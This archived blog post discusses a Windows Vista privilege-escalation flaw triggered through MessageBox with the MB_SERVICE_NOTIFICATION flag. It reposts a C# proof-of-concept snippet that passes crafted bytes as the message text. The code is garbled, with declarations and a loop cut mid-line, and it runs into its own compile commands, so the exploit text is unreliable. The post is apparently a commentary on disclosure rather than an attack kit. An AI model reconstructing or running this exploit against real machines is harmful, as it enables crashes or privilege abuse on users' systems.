You are viewing a read-only archive of the Blogs.Harvard network. Learn more.
Skip to content

Vista exploit code

Feel free to send 50k to my paypal account :)

Russian sites are starting to post proof of concept code now. I had little idea of how trivial this exploit would be to understand but it would seem that error message parameters are used to elevate privledges. If the MB_SERVICE_NOTIFICATION flag is specified when calling the MessageBox function from the Windows API, it will use the NtRaiseHardError syscall to send a HardError message to CSRSS.

// Вариант на C#
// mbox.cs
using System;
using System.Runtime.InteropServices;
class HelloWorldFromMicrosoft
unsafe public static extern int MessageBoxA(uint hwnd, byte* lpText, byte* lpCaption, uint uType);

static unsafe void Main()
byte[] helloBug = new byte[] {0x5C, 0x3F, 0x3F, 0x5C, 0x21, 0x21, 0x21, 0x00};
uint MB_SERVICE_NOTIFICATION = 0x00200000u;
fixed(byte* pHelloBug = &helloBug[0])
for(int i=0; i> csc /unsafe mbox.cs
>> mbox.exe

the original exploit code found was impossible to enter into this blog so I’m uploading a picture of it.
msgbox exploit

Post a Comment

You must be logged in to post a comment.